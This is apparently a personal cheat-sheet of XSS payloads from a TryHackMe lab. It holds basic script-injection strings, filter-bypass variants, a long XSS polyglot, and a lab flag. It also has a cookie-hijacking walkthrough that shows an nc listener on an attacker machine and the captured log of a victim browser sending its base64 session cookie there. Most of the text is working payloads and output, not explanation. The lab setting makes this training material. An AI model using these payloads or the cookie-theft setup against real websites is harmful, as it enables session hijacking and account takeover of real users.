XSS
https://github.com/mandatoryprogrammer/xsshunter-express
Basic payload
<script>alert('THM');</script>
"><script>alert('THM');</script>
</textarea><script>alert('THM');</script>
';alert('THM');//
When filter remove script
tag.
<sscriptcript>alert('THM');</sscriptcript>
When <>
are filtered.
/images/cat.jpg" onload="alert('THM');"
Flag.
THM{XSS_MASTER}
XSS polyglot.
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */onerror=alert('THM') )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert('THM')//>\x3e
Cookie hijacking
-
Run http server on attacker machine
2. Generate a payload 3. Catch cookieroot@ip-10-10-117-154:~# nc -nlvp 9001 Listening on [0.0.0.0] (family 0, port 9001) Connection from 10.10.222.139 34142 received! GET /?cookie=c3RhZmYtc2Vzc2lvbj00QUIzMDVFNTU5NTUxOTc2OTNGMDFENkY4RkQyRDMyMQ== HTTP/1.1 Host: 10.10.117.154:9001 Connection: keep-alive User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/89.0.4389.72 Safari/537.36 Accept: */* Origin: http://172.17.0.1 Referer: http://172.17.0.1/ Accept-Encoding: gzip, deflate Accept-Language: en-US
-
Decode b64 cookie